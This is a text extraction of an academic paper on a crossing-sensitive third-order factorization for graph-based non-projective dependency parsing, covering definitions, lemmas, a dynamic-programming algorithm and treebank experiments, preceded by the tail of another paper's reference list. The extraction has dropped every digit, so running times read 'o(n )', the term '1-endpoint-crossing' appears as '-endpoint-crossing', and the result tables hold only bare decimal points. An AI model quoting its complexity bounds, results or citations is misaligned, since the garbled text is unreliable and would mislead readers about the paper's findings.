ryan mcdon- ald, jens nilsson, sebastian riedel, and deniz yuret. . the conll shared task on dependency parsing. in proceedings of emnlp-conll. joakim nivre. . an efficient algorithm for pro- jective dependency parsing. in proceedings of the eighth international workshop on parsing technolo- gies (iwpt), pages – , nancy, france. joakim nivre. . incrementality in deterministic de- pendency parsing. in workshop on incremental pars- ing: bringing engineering and cognition together, pages – , barcelona, spain. joakim nivre. . algorithms for deterministic incre- mental dependency parsing. computational linguist- ics, ( ): – . francesco sartorio, giorgio satta, and joakim nivre. . a transition-based dependency parser using a dynamic parsing strategy. in proceedings of the st annual meeting of the association for computational linguistics (volume : long papers), pages – , sofia, bulgaria, august. association for computa- tional linguistics. yue zhang and stephen clark. . a tale of two parsers: investigating and combining graph-based and transition-based dependency parsing. in proceedings of emnlp. a crossing-sensitive third-order factorization for dependency parsing a crossing-sensitive third-order factorization for dependency parsing emily pitler∗ google research th avenue new york, ny epitler@google.com abstract parsers that parametrize over wider scopes are generally more accurate than edge-factored models. for graph-based non-projective parsers, wider factorizations have so far im- plied large increases in the computational complexity of the parsing problem. this paper introduces a “crossing-sensitive” generaliza- tion of a third-order factorization that trades off complexity in the model structure (i.e., scoring with features over multiple edges) with complexity in the output structure (i.e., producing crossing edges). under this model, the optimal -endpoint-crossing tree can be found in o(n ) time, matching the asymp- totic run-time of both the third-order projec- tive parser and the edge-factored -endpoint- crossing parser. the crossing-sensitive third- order parser is significantly more accurate than the third-order projective parser under many experimental settings and significantly less accurate on none. introduction conditioning on wider syntactic contexts than sim- ply individual head-modifier relationships improves parsing accuracy in a wide variety of parsers and frameworks (charniak and johnson, ; mcdon- ald and pereira, ; hall, ; carreras, ; martins et al., ; koo and collins, ; zhang and nivre, ; bohnet and kuhn, ; martins et al., ). this paper proposes a new graph- based dependency parser that efficiently produces ∗the majority of this work was done while at the university of pennsylvania. the globally optimal dependency tree according to a third-order model (that includes features over grand- parents and siblings in the tree) in the class of - endpoint-crossing trees (that includes all projective trees and the vast majority of non-projective struc- tures seen in dependency treebanks). within graph-based projective parsing, the third- order parser of koo and collins ( ) has a run- time of o(n ), just one factor of n more expensive than the edge-factored model of eisner ( ). in- corporating richer features and producing trees with crossing edges has traditionally been a challenge, however, for graph-based dependency parsers. if parsing is posed as the problem of finding the op- timal scoring directed spanning tree, then the prob- lem becomes np-hard when trees are scored with a grandparent and/or sibling factorization (mcdonald and pereira, ; mcdonald and satta, ). for various definitions of mildly non-projective trees, even edge-factored versions are expensive, with edge-factored running times between o(n ) and o(n ) (gómez-rodrı́guez et al., ; pitler et al., ; pitler et al., ; satta and kuhlmann, ). the third-order projective parser of koo and collins ( ) and the edge-factored -endpoint- crossing parser described in pitler et al. ( ) have some similarities: both use o(n ) time and o(n ) space, using sub-problems over intervals with one exterior vertex, which are constructed using one free split point. the two parsers differ in how the exterior vertex is used: koo and collins ( ) use the exterior vertex to store a grandparent in- dex, while pitler et al. ( ) use the exterior ver- tex to introduce crossed edges between the point and transactions of the association for computational linguistics, ( ) – . action editor: joakim nivre. submitted / ; revised / ; published / . c© association for computational linguistics. projective -endpoint-crossing edge o(n ) o(n ) eisner ( ) pitler et al. ( ) cs-gsib o(n ) o(n ) koo and collins ( ) this paper table : parsing time for various output spaces and model factorizations. cs-gsib refers to the (crossing-sensitive) grand-sibling factorization described in this paper. the interval. this paper proposes merging the two parsers to achieve the best of both worlds – produc- ing the best tree in the wider range of -endpoint- crossing trees while incorporating the identity of the grandparent and/or sibling of the child in the score of an edge whenever the local neighborhood of the edge does not contain crossing edges. the crossing-sensitive grandparent-sibling -endpoint- crossing parser proposed here takes o(n ) time, matching the runtime of both the third-order pro- jective parser and of the edge-factored -endpoint- crossing parser (see table ). the parsing algorithms of koo and collins ( ) and pitler et al. ( ) are reviewed in section . the proposed crossing-sensitive factorization is de- fined in section . the parsing algorithm that finds the optimal -endpoint-crossing tree according to this factorization is described in section . the implemented parser is significantly more accurate than the third-order projective parser in a variety of languages and treebank representations (section ). section discusses the proposed approach in the context of prior work on non-projective parsing. preliminaries in a projective dependency tree, each subtree forms one consecutive interval in the sequence of input words; equivalently (assuming an artificial root node placed as either the first or last token), when all edges are drawn in the half-plane above the sen- tence, no two edges cross (kübler et al., ). two vertex-disjoint edges cross if their endpoints inter- leave. a -endpoint-crossing tree is a dependency tree such that for each edge, all edges that cross it share a common vertex (pitler et al., ). note that the class of projective trees is properly included within the class of -endpoint-crossing trees. to avoid confusion between intervals and edges, g h e = g h m + h m e (a) m is the child of h that e is descended from g h = g h + hm ss m (b) the edge ~ehm is added to the tree; s is m’s adjacent inner sibling = + hm h s r+ r msh (c) r is s’s outermost descendant; r + is m’s innermost descendant figure : algorithm for grand-sibling projective parsing; the figures replicate figure in koo and collins ( ). ~eij denotes the directed edge from i to j (i.e., i is the parent of j). interval notation ((i, j), [i, j], (i, j], or [i, j)) is used to denote sets of vertices between i and j, with square brackets indicating closed intervals and round brackets indicating open intervals. . grand-sibling projective parsing a grand-sibling factorization allows features over -tuples of (g, h, m, s), where h is the parent of m, g is m’s grandparent, and s is m’s adjacent in- ner sibling. features over these grand-sibling - tuples are referred to as “third-order” because they scope over three edges simultaneously (~egh, ~ehs, and ~ehm). the parser of koo and collins ( ) pro- duces the highest-scoring projective tree according to this grand-sibling model by adding an external grandparent index to each of the sub-problems used in the sibling factorization (mcdonald and pereira, ). figure in koo and collins ( ) provided a pictorial view of the algorithm; for convenience, it is replicated in figure . an edge ~ehm is added to the tree in the “trapezoid” step (figure b); this allows the edge to be scored conditioned on m’s grandpar- ent (g) and its adjacent inner sibling (s), as all four relevant indices are accessible. . edge-factored -endpoint-crossing parsing the edge-factored -endpoint-crossing parser of pitler et al. ( ) produces the highest scoring - * which cars do americans ?daysfavor most these figure : a -endpoint-crossing non-projective english sentence from the wsj penn treebank (marcus et al., ), converted to dependencies with pennconverter (johansson and nugues, ). do americans favor do ?daysfavor most these * do * which cars do favor figure : constructing a -endpoint-crossing tree with intervals with one exterior vertex (pitler et al., ). endpoint-crossing tree with each edge ~ehm scored according to score(edge(h, m)). the -endpoint- crossing property allows the tree to be built up in edge-disjoint pieces each consisting of intervals with one exterior point that has edges into the interval. for example, the tree in figure would be built up with the sub-problems shown in figure . to ensure that crossings within a sub-problem are consistent with the crossings that happen as a result of combination steps, the algorithm uses four dif- ferent “types” of sub-problems, indicating whether the edges incident to the exterior point may be inter- nally crossed by edges incident to the left boundary point (l), the right (r), either (lr), or neither (n). in figure , the sub-problem over [*, do] ∪{favor} would be of type r, and [favor, ?]∪{do} of type l. . . naı̈ve approach to including grandparent features the example in figure illustrates the difficulty of incorporating grandparents into the scoring of all edges in -endpoint-crossing parsing. the vertex favor has a parent or child in all three of the sub- problems. in order to use grandparent scoring for the edges from favor to favor’s children in the other two sub-problems, we would need to augment the problems with the grandparent index do. we also must add the parent index do to the middle sub- problem to ensure consistency (i.e., that do is in fact the parent assigned). thus, a first attempt to score all edges with grandparent features within -endpoint- crossing trees raises the runtime from o(n ) to o(n ) (all of the four indices need a “predicted par- ent” index; at least one edge is always implied so one of these additional indices can be dropped). crossing-sensitive factorization factorizations for projective dependency parsing have often been designed to allow efficient pars- ing. for example, the algorithms in eisner ( ) and mcdonald and pereira ( ) achieve their ef- ficiency by assuming that children to the left of the parent and to the right of the parent are independent of each other. the algorithms of carreras ( ) and model in koo and collins ( ) include grandparents for only the outermost grand-children of each parent for efficiency reasons. in a similar spirit, this paper introduces a variant of the grand- sib factorization that scores crossed edges indepen- dently (as a crossededge part) and uncrossed edges under either a grandparent-sibling, grandparent, sib- ling, or edge-factored model depending on whether relevant edges in its local neighborhood are crossed. a few auxiliary definitions are required. for any parent h and grandparent g, h’s children are parti- tioned into interior children (those between g and h) and exterior children (the complementary set of chil- dren). interior children are numbered from closest to h through furthest from h; exterior children are first numbered on the side closer to h from closest to h through furthest, then the enumeration wraps around to include the vertices on the side closer to g. figure shows a parent h, its grandparent g, and a possible sequence of three interior and four exterior children. note that for a projective tree, there would not be any children on the far side of g. definition . let h be m’s parent. outer(m) is the set of siblings of m that are in the same subset of h’s children and are later in the enumeration than m is. for example, in the tree in figure , because dependency trees are directed trees, each node ex- cept for the artificial root has a unique parent. to ensure that grandparent is defined for the root’s children, assume an artifi- cial parent of the root for notational convenience. e e i i i hge e figure : the exterior children are numbered first begin- ning on the side closest to the parent, then the side closest to the grandparent. there must be a path from the root to g, so the edges from h to its exterior children on the far side of g are guaranteed to be crossed. crossed(~ehs) ¬crossed(~ehs) ¬gproj(~ehm) edge(h, m) sib(h, m, s) gproj(~ehm) grand(g, h, m) grandsib(g, h, m, s) table : part type for an uncrossed edge ~ehm for the crossing-sensitive third-order factorization (g is m’s grandparent; s is m’s inner sibling). outer(most) = {days, cars}. definition . an uncrossed edge ~ehm is gproj if both of the following hold: . the edge ~egh from h’s parent to h is not crossed . none of the edges from h to outer(m) (m’s outer siblings) are crossed uncrossed gproj edges include the grandparent in the part. the part includes the sibling if the edge ~ehs from the parent to the sibling is not crossed. ta- ble gives the factorization for uncrossed edges. the parser in this paper finds the optimal - endpoint-crossing tree according to this factorized form. a fully projective tree would decompose into exclusively grandsib parts (as all edges would be uncrossed and gproj ). as all projective trees are within the -endpoint-crossing search space, the optimization problem that the parser solves includes all projective trees scored with grand-sibling fea- tures everywhere. projective parsing with grand- sibling scores can be seen as a special case, as the crossing-sensitive -endpoint-crossing parser can simulate a grand-sibling projective parser by setting all crossed(h, m) scores to −∞. in figure , the edge from do to americans is not gproj because condition ( ) is violated, while the edge from favor to most is not gproj because condition ( ) is violated. under this definition, the vertices do and favor (which have children in mul- tiple sub-problems) do not need external grandpar- ent indices in any of their sub-problems. table crossededge(*,do) sib(cars, which, -) crossededge(favor,cars) sib(do, americans, -) sib(do, favor, americans) crossededge(do,?) sib(favor, most, -) sib(favor, days, most) gsib(favor, days, these, -) table : decomposing figure according to the crossing-sensitive third-order factorization described in section . null inner siblings are indicated with -. lists the parts in the tree in figure according to this crossing-sensitive third-order factorization. parsing algorithm the parser finds the maximum scoring -endpoint- crossing tree according to the factorization in sec- tion with a dynamic programming procedure rem- iniscent of koo and collins ( ) (for scoring un- crossed edges with grandparent and/or sibling fea- tures) and of pitler et al. ( ) (for including crossed edges). the parser also uses novel sub- problems for transitioning between portions of the tree with and without crossed edges. this formula- tion of the parsing problem presents two difficulties: . the parser must know whether an edge is crossed when it is added. . for uncrossed edges, the parser must use the appropriate part for scoring according to whether other edges are crossed (table ). difficulty is solved by adding crossed and un- crossed edges to the tree in distinct sub-problems (section . ). difficulty is solved by producing different versions of subtrees over the same sets of vertices, both with and without a grandparent index, which differ in their assumptions about the tree out- side of that set (section . ). the list of all sub- problems with their invariants and the full dynamic program are provided in the supplementary material. . enforcing crossing edges the parser adds crossed and uncrossed edges in distinct portions of the dynamic program. un- crossed edges are added only through trapezoid sub- problems (that may or may not have a grandpar- ent index), while crossed edges are added in non- trapezoid sub-problems. to add all uncrossed edges in trapezoid sub-problems, the parser (a) enforces that any edge added anywhere else must be crossed, and (b) includes transitional sub-problems to build trapezoids when the edge ~ehm is not crossed, but the edge to its inner sibling ~ehs is (and so the construc- tion step shown in figure b cannot be used). . . crossing conditions pitler et al. ( ) included crossing edges by using “crossing region” sub-problems over intervals with an external vertex that optionally contained edges between the interval and the external vertex. an uncrossed edge could then be included either by a derivation that prohibited it from being crossed or a derivation which allowed (but did not force) it to be crossed. this ambiguity is removed by enforcing that ( ) each crossing region contains at least one edge incident to the exterior vertex, and ( ) all such edges are crossed by edges in another sub-problem. for example, by requiring at least one edge between do and (favor, ?] and also between favor and (*, do), the edges in the two sets are guaranteed to cross. . . trapezoids with edge to inner sibling crossed to add all uncrossed edges in trapezoid-style sub- problems, we must be able to construct a trapezoid over vertices [h, m] whenever the edge ~ehm is not crossed. the construction used in koo and collins ( ), repeated graphically in figure a, cannot be used if the edge ~ehs is crossed, as there would then exist edges between (h, s) and (s, m), making s an invalid split point. the parser therefore includes some “transitional glue” to allow alternative ways to construct the trapezoid over [h, m] when ~ehm is not crossed but the edge ~ehs to m’s inner sibling is. the two additional ways of building trapezoids are shown graphically in figures b and c. con- sider the “chain of crossing edges” that includes the edge ~ehs. if none of these edges are in the subtree rooted at m, then we can build the tree involving m and its inner descendants separately (figure b) from the rest of the tree rooted at h. within the in- terval [h, e − ] the furthest edge incident to h (~ehs) must be crossed: these intervals are parsed choosing s and the crossing point of ~ehs simultaneously (as in figure in pitler et al. ( )). otherwise, the sub-tree rooted at m is involved in g h = g h + hm ss m (a) edge from h to inner sibling s is not crossed (re- peats figure b) g h = hm mh + ee− (b) ~ehs is crossed, but the chain of crossing edges involving ~ehs does not include any descendants of m. e is m’s descendant furthest from m within (h, m). s ∈ (h, e− ). h m + d = mg h h d (c) ~ehs is crossed, and the chain of crossing edges involving ~ehs includes descendants of m. of m’s de- scendants that are incident to edges in the chain, d is the one closest to m (d can be m itself). s ∈ (h, d). figure : ways to build a trapezoid when the edge ~ehs to m’s inner sibling may be crossed. the chain of crossing edges (figure c). the chain of crossing edges between h and d (m’s descendant, which may be m itself) is built up first then concate- nated with the triangle rooted at m containing m’s inner descendants not involved in the chain. chains of crossing edges are constructed by re- peatedly applying two specialized types of l items that alternate between adding an edge from the in- terval to the exterior point (right-to-left) or from the exterior point to the interval (left-to-right) (fig- ure ). the boundary edges of the chain can be crossed more times without violating the - endpoint-crossing property, and so the beginning and end of the chain can be unrestricted crossing regions. these specialized chain sub-problems are also used to construct boxes (figure c) over [s, m] with shared parent h when neither edge ~ehs nor ~ehm is crossed, but the subtrees rooted at m and at s cross each other (figure ). lemma . the grandsib-crossing parser adds all uncrossed edges and only uncrossed edges in a tree in a “trapezoid” sub-problem. proof. the only part is easy: when a trapezoid is built over an interval [h, m], all edges are internal to the interval, so no earlier edges could cross ~ehm. af- = + h s k s k + s k dh d di k x i d di k = + k k + x i x i d = + k k + x idx i = + i d x i d figure : constructing a chain of crossing edges h d m + h d m h me = h s m h s d = d e + figure : constructing a box when edges in m and s’s subtrees cross each other. ter the trapezoid is built, only the interval endpoints h and m are accessible for the rest of the dynamic program, and so an edge between a vertex in (h, m) and a vertex /∈ [h, m] can never be added. the crossing conditions ensure that every edge added in a non-trapezoid sub-problem is crossed. lemma . the grandsib-crossing parser con- siders all -endpoint-crossing trees and only - endpoint-crossing trees. proof. all trees that could have been built in pitler et al. ( ) are still possible. it can be verified that the additional sub-problems added all obey the - endpoint-crossing property. . reduced context in presence of crossings a crossed edge (added in a non-trapezoid sub- problem) is scored as a crossededge part. an uncrossed edge added in a trapezoid sub-problem, however, may need to be scored according to a grandsib, grand, sib, or edge part, depending on whether the relevant other edges are crossed. in this section we show that sibling and grandparent fea- tures are included in the grandsib-crossing parser as specified by table . do favor most these days (a) for good contexts favor most these daysdo (b) for bad contexts figure : for each of the interval sub-problems in koo and collins ( ), the parser constructs versions with and without the additional grandparent index. figure b is used if the edge from do to favor is crossed, or if there are any crossed edges from favor to children to the left of do or to the right of days. otherwise, figure a is used. . . sibling features lemma . the grandsib-crossing parser scores an uncrossed edge ~ehm with a sib or grandsib part if and only if ~ehs is not crossed. proof. whether the edge to an uncrossed edge’s in- ner sibling is crossed is known bottom-up through how the trapezoid is constructed, since the inner sib- ling is internal to the sub-problem. when ~ehs is not crossed, the trapezoid is constructed as in figure a, using the inner sibling as the split point. when the edge ~ehs is crossed, the trapezoid is constructed as in figure b or c; note that both ways force the edge to the inner sibling to be crossed. . . grandparent features for gproj edges koo and collins ( ) include an external grand- parent index for each of the sub-problems that the edges within use for scoring. we want to avoid adding such an external grandparent index to any of the crossing region sub-problems (to stay within the desired time and space constraints) or to inter- val sub-problems when the external context would make all internal edges ¬gproj . for each interval sub-problem, the parser con- structs versions both with and without a grandpar- ent index (figure ). which version is used de- pends on the external context. in a bad context, all edges to children within an interval are guaranteed to be ¬gproj . this section shows that all boundary points in crossing regions are placed in bad contexts, and then that edges are scored with grandparent fea- tures if and only if they are gproj . bad contexts for interval boundary points for exterior vertex boundary points, all edges from it to its children will be crossed (section . . ), so it does not need a grandparent index. lemma . if a boundary point i’s parent (call it g) is within a sub-problem over vertices [i, j] or [i, j]∪ {x}, then for all uncrossed edges ~eim with m in the sub-problem, the tree outside of the sub-problem is irrelevant to whether ~eim is gproj . proof. the sub-problem contains the edge ~egi, so condition ( ) is checked internally. m cannot be x, since ~eim is uncrossed. if g is x, then ~eim is ¬gproj regardless of the outer context. if both g and m ∈ (i, j], then outer(m) ⊆ (i, j]: if m is an interior child of i (m ∈ (i, g)) then outer(m) ⊆ (m, g) ⊆ (i, j]. otherwise, if m is an exterior child (m ∈ (g, j]), by the “wrapping around” definition of outer, outer(m) ⊆ (g, m) ⊆ (i, j]. thus condi- tion ( ) is also checked internally. we can therefore focus on interval boundary points with their parent outside of the sub-problem. definition . the left boundary vertex of an inter- val [i, j] is in a bad context (badcontextl(i, j)) if i receives its parent (call it g) from outside of the sub-problem and either of the following hold: . grand-edge crossed: ~egi is crossed . outer-child-edge crossed: an edge from i to a child of i outside of [i, j] and outer to j will be crossed (recall this includes children on the far side of g if g is to the left of i) badcontextr(i, j) is defined symmetrically regard- ing j and j’s parent and children. corollary . if badcontextl(i, j), then for all ~eim with m ∈ (i, j], ~eim is ¬gproj . similarly, if badcontextr(i, j), for all ~ejm with m ∈ [i, j), ~ejm is ¬gproj . no grandparent indices for crossing regions we would exceed the desired o(n ) run-time if any crossing region sub-problems needed any grand- parent indices. in pitler et al. ( ), lr sub- problems with edges from the exterior point crossed by both the left and the right boundary points were constructed by concatenating an l and an r sub- problem. since the split point was not necessar- ily incident to a crossed edge, the split point might have gproj edges to children on the side other than where it gets its parent; accommodating this would add another factor of n to the running time and space x k jx i j = + kix figure : for all split points k, the edge from k’s parent to k is crossed, so all edges from k to children on either side were ¬gproj . the case when the split point’s parent is from the right is symmetric. x i k j (a) x is outer to all children of k in (k, j]. x i k j (b) x is outer to all children of k in [i, k). figure : the edge ~ekx is guaranteed to be crossed, so k is in a badcontext for whichever side it does not get its parent from. to store the split point’s parent. to avoid this in- crease in running time, they are instead built up as in figure , which chooses the split point so that the edge from the parent of the split point to it is crossed. lemma . for all crossing region sub-problems [i, j] ∪ {x} with i’s parent /∈ [i, j] ∪ {x}, badcontextl(i, j). similarly, when j’s parent /∈ [i, j]∪{x}, badcontextr(i, j). proof. crossing region sub-problems either com- bine to form intervals or larger crossing regions. when they combine to form intervals as in figure , it can be verified that all boundary points are in a bad context. lr sub-problems were discussed above. split points for the l/r/n sub-problems by construction are incident to a crossed edge to a fur- ther vertex. if that edge is from the split point’s par- ent to the split point, then the grand-edge is crossed and so both sides are in a bad context. if the crossed edge is from the split point to a child, then that child is outer to all other children on the side in which it does not get its parent (see figure ). corollary . no grandparent indices are needed for any crossing region sub-problem. triangles and trapezoids with and without grandparent indices the presentation that fol- lows assumes left-headed versions. uncrossed edges are added in two distinct types of trapezoids: ( ) trapg[h, m, g, l] with an external grandpar- ent index g, scores the edge ~ehm with grandpar- ent features, and ( ) trap[h, m, l] without a grand- parent index, scores the edge ~ehm without grand- parent features. triangles also have versions with (trig[h, e, g, l] and without (tri[h, e, l]) a grand- parent index. what follows shows that all gproj edges are added in trapg sub-problems, and all ¬gproj uncrossed edges are added in trap sub- problems. lemma . for all k ∈ (i, j), if badcontextl(i, j), then badcontextl(i, k). similarly, if badcontextr(i, j), then badcontextr(k, j). proof. badcontextl(i, j) implies either the edge from i’s parent to i is crossed and/or an edge from i to a child of i outer to j is crossed. if the edge from i’s parent to i is crossed, then badcontextl(i, k). if a child of i is outer to j, then since k ∈ (i, j), such a child is also outer to k. lemma . all left-rooted triangle sub-problems tri[i, j, l] without a grandparent index are in a badcontextl(i, j). similarly for all tri[i, j, r], badcontextr(i, j). proof. all triangles without grandparent indices are either placed immediately into a bad context (by adding a crossed edge to the triangle’s root from its parent, or a crossed edge from the root to an outer child) or are combined with other sub-trees to form larger crossing regions (and therefore the triangle is in a bad context, using lemmas and ). lemma . all triangle sub-problems with a grand- parent index trig[h, e, g, l] are placed in a ¬badcontextl(h, e). similarly, trig[e, h, g, r] are only placed in ¬badcontextr(h, e). proof. consider where a non-empty triangle (h = e) with a grandparent index trig[h, e, g, l] can be placed in the full dynamic program and what each step would imply about the rest of the tree. if the triangle contains exterior children of h (e and g are on opposite sides of h), then it can either combine with a trapezoid to form another larger tri- angle (as in figure a) or it can combine with an- other sub-problem to form a box with a grandpar- ent index (figure c or ). boxes with a grandpar- ent index can only combine with another trapezoid to form a larger trapezoid (figure b). both cases force ~egh to not be crossed and prevent h from hav- ing any outer crossed children, as h becomes an in- ternal node within the larger sub-problem. if the triangle contains interior children of h (e lies between g and h), then it can either form a trape- zoid from g to h by combining with a triangle (fig- ure b) or a chain of crossing edges (figure c), or it can be used to build a box with a grandparent index (figures c and ), which then can only be used to form a trapezoid from g to h. in either case, a trape- zoid is constructed from g to h, enforcing that ~egh cannot be crossed. these steps prevent h from hav- ing any additional children between g and e (since h does not appear in the adjacent sub-problems at all whenever h = e), so again the children of h in (e, h) have no outer siblings. lemma . in a trig[h, e, g, l] sub-problem, if an edge ~ehm is not crossed and no edges from i to sib- lings of m in (m, e] are crossed, then ~ehm is gproj . proof. this follows from ( ) the edge ~ehm is not crossed, ( ) the edge ~egh is not crossed by lemma , and ( ) no outer siblings are crossed (outer siblings in (m, e] are not crossed by assumption and siblings outer to e are not crossed by lemma ). lemma . an edge ~ehm scored with a grandsib or grand part (added through a trapg[h, m, g, l] or trapg[m, h, g, r] sub-problem) is gproj . proof. a trapg can either ( ) combine with de- scendants of m to form a triangle with a grandparent index rooted at h (indicating that m is the outermost inner child of h) or ( ) combine with descendants of m and of m’s adjacent outer sibling (call it o), forming a trapezoid from h to o (indicating that ~eho is not crossed). such a trapezoid could again only combine with further uncrossed outer siblings until eventually the final triangle rooted at h with grand- parent index g is built. as ~ehm was not crossed, no edges from h to outer siblings within the triangle are crossed, and ~ehm is within a trig sub-problem, ~ehm is gproj by lemma . lemma . an uncrossed edge ~ehm scored with a sib or edge part (added through a trap[h, m, l] or trap[m, h, r] sub-problem) is ¬gproj . proof. a trap can only ( ) form a triangle without a grandparent index, or ( ) form a trapezoid to an outer sibling of m, until eventually a final triangle rooted at h without a grandparent index is built. this triangle without a grandparent index is then placed in a bad context (lemma ) and so ~ehm is ¬gproj (corollary ). . main results lemma . the crossing-sensitive third-order parser runs in o(n ) time and o(n ) space when the input is an unpruned graph. when the input to the parser is a pruned graph with at most k in- coming edges per node, the crossing-sensitive third- order parser runs in o(kn ) time and o(n ) space. proof. all sub-problems are either over intervals (two indices), intervals with a grandparent index (three indices), or crossing regions (three indices). no crossing regions require any grandparent indices (corollary ). the only sub-problems that require a maximization over two internal split points are over intervals and need no grandparent indices (as the furthest edges from each root are guaranteed to be crossed within the sub-problem). all steps ei- ther contain an edge in their construction step or in the invariant of the sub-problem, so with a pruned graph as input, the running time is the number of edges (o(kn)) times the number of possibilities for the other two free indices (o(n )). the space is not reduced as there is not necessarily an edge relation- ship between the three stored vertices. theorem . the grandsib-crossing parser cor- rectly finds the maximum scoring -endpoint- crossing tree according to the crossing-sensitive third-order factorization (section ) in o(n ) time and o(n ) space. when the input to the parser is a pruned graph with at most k incoming edges per node, the grandsib-crossing parser correctly finds the maximum scoring -endpoint-crossing tree that uses only unpruned edges in o(kn ) time and o(n ) space. proof. the correctness of scoring follows from lemmas , , and . the search space of - endpoint-crossing trees was in lemma and the time and space complexity in lemma . the parser produces the optimal tree in a well- defined output space. pruning edges restricts the output space the same way that constraints enforc- ing projectivity or the -endpoint-crossing property also restrict the output space. note that if the optimal unconstrained -endpoint-crossing tree does not in- clude any pruned edges, then whether the parser uses pruning or not is irrelevant; both the pruned and un- pruned parsers will produce the exact same tree. experiments the crossing-sensitive third-order parser was imple- mented as an alternative parsing algorithm within dpo (koo and collins, ). to ensure a fair comparison, all code relating to input/output, fea- tures, learning, etc. was re-used from the origi- nal projective implementation, and so the only sub- stantive differences between the projective and - endpoint-crossing parsers are the dynamic pro- gramming charts, the parsing algorithms, and the routines that extract the maximum scoring tree from the completed chart. the treebanks used to prepare the conll shared task data (buchholz and marsi, ; nivre et al., ) vary widely in their conventions for repre- senting conjunctions, modal verbs, determiners, and other decisions (zeman et al., ). the exper- iments use the newly released hamledt software (zeman et al., ) that normalizes these treebanks into one standard format and also provides built-in transformations to other conjunction styles. the un- normalized treebanks input to hamledt were from the conll shared task (buchholz and marsi, ) for danish, dutch, portuguese, and swedish and from the conll shared task (nivre et al., ) for czech. the experiments include the default prague style (böhmová et al., ), mel’čukian style (mel’čuk, ), and stanford style (de marneffe and manning, ) for conjunctions. under the grandparent-sibling factorization, the two words be- ing conjoined would never appear in the same scope for the prague style (as they are siblings on differ- ent sides of the conjunct head). in the mel’čukian style, the two conjuncts are in a grandparent rela- tionship and in the stanford style the two conjuncts http://groups.csail.mit.edu/nlp/dpo / are in a sibling relationship, and so we would expect to see larger gains for including grandparents and siblings under the latter two representations. the experiments also include a nearly projective dataset, the english penn treebank (marcus et al., ), converted to dependencies with pennconverter (jo- hansson and nugues, ). the experiments use marginal-based pruning based on an edge-factored directed spanning tree model (mcdonald et al., ). each word’s set of potential parents is limited to those with a marginal probability of at least . times the probability of the most probable parent, and cut off this list at a max- imum of potential parents per word. to ensure that there is always at least one projective and/or - endpoint-crossing tree achievable, the artificial root is always included as an option. the pruning param- eters were chosen to keep . % of the true edges on the english development set. following carreras ( ) and koo and collins ( ), before training the training set trees are transformed to be the best achievable within the model class (i.e., the closest projective tree or - endpoint-crossing tree). all models are trained for five iterations of averaged structured perceptron training. for english, the model after the iteration that performs best on the development set is used; for all other languages, the model after the fifth iter- ation is used. . results results for edge-factored and (crossing-sensitive) grandparent-sibling factored models for both projec- tive and -endpoint-crossing parsing are in tables and . in out of the experimental set-ups, the third-order -endpoint-crossing parser is more accurate than the third-order projective parser. it is significantly better than the projective parser in of the set-ups and significantly worse in none. table shows how often the -ec cs-gsib parser used each of the grandsib, grand, sib, edge, and crossededge parts for the mel’čukian and stanford style test sets. in both representations, following prior work in graph-based dependency parsing (for example, rush and petrov ( )), english results use au- tomatically produced part-of-speech tags and results exclude punctuation, while the results for all other languages use gold part-of-speech tags and include punctuation. model du cz pt da sw prague proj gsib . . . . . proj edge . . . . . -ec cs-gsib . . . . . -ec edge . . . . . mel’čukian proj gsib . . . . . proj edge . . . . . -ec cs-gsib . . . . . -ec edge . . . . . stanford proj gsib . . . . . proj edge . . . . . -ec cs-gsib . . . . . -ec edge . . . . . table : overall unlabeled attachment scores (uas) for all words. cs-gsib is the proposed crossing-sensitive grandparent-sibling factorization. for each data set, we bold the most accurate model and those not significantly different from the most accurate (sign test, p < . ). lan- guages are sorted in increasing order of projectivity. model uas proj gsib . proj edge . -ec cs-gsib . -ec edge . table : english results the parser is able to score with a sibling context more often than it is able to score with a grandpar- ent, perhaps explaining why the datasets using the stanford conjunction representation saw the largest gains from including the higher order factors into the -endpoint-crossing parser. across languages, the third-order -endpoint- crossing parser runs . - . times slower than the third-order projective parser ( - words per sec- ond, compared with - words per second). parsing speed is correlated with the amount of prun- ing. the level of pruning mentioned earlier is rela- tively permissive, retaining . - . % of the edges in the complete graph; a higher level of pruning could likely achieve much faster parsing times with the same underlying parsing algorithms. part used du cz pt da sw mel’čukian crossededge . . . . . grandsib . . . . . grand . . . . . sib . . . . . edge < . < . < . stanford crossededge . . . . . grandsib . . . . . grand . . . . . sib . . . . . edge < . . < . table : the proportion of edges in the predicted output trees from the cs-gsib -endpoint-crossing parser that would have used each of the five part types for scoring. discussion there have been many other notable approaches to non-projective parsing with larger scopes than single edges, including transition-based parsers, directed spanning tree graph-based parsers, and mildly non- projective graph-based parsers. transition-based parsers score actions that the parser may take to transition between different configurations. these parsers typically use either greedy or beam search, and can condition on any tree context that is in the history of the parser’s actions so far. zhang and nivre ( ) signifi- cantly improved the accuracy of an arc-eager tran- sition system (nivre, ) by adding several ad- ditional classes of features, including some third- order features. basic arc-eager and arc-standard (nivre, ) models that parse left-to-right using a stack produce projective trees, but transition-based parsers can be modified to produce crossing edges. such modifications include pseudo-projective pars- ing in which the dependency labels encode transfor- mations to be applied to the tree (nivre and nilsson, ), adding actions that add edges to words in the stack that are not the topmost item (attardi, ), adding actions that swap the positions of words (nivre, ), and adding a second stack (gómez- rodrı́guez and nivre, ). graph-based approaches to non-projective pars- ing either consider all directed spanning trees or re- stricted classes of mildly non-projective trees. di- rected spanning tree approaches with higher order features either use approximate learning techniques, such as loopy belief propagation (smith and eis- ner, ), or use dual decomposition to solve relax- ations of the problem (koo et al., ; martins et al., ). while not guaranteed to produce optimal trees within a fixed number of iterations, these dual decomposition techniques do give certificates of op- timality on the instances in which the relaxation is tight and the algorithm converges quickly. this paper described a mildly non-projective graph-based parser. other parsers in this class find the optimal tree in the class of well-nested, block degree two trees (gómez-rodrı́guez et al., ), or in a class of trees further restricted based on gap inheritance (pitler et al., ) or the head-split property (satta and kuhlmann, ), with edge- factored running times of o(n ) − o(n ). the factorization used in this paper is not immediately compatible with these parsers: the complex cases in these parsers are due to gaps, not crossings. how- ever, there may be analogous “gap-sensitive” factor- izations that could allow these parsers to be extended without large increases in running times. conclusion this paper proposed an exact, graph-based algo- rithm for non-projective parsing with higher order features. the resulting parser has the same asymp- totic run time as a third-order projective parser, and is significantly more accurate for many experimental settings. an exploration of other factorizations that facilitate non-projective parsing (for example, an analogous “gap-sensitive” variant) may be an inter- esting avenue for future work. recent work has in- vestigated faster variants for third-order graph-based projective parsing (rush and petrov, ; zhang and mcdonald, ) using structured prediction cascades (weiss and taskar, ) and cube prun- ing (chiang, ). it would be interesting to extend these lines of work to the crossing-sensitive third- order parser as well. acknowledgments i would like to thank 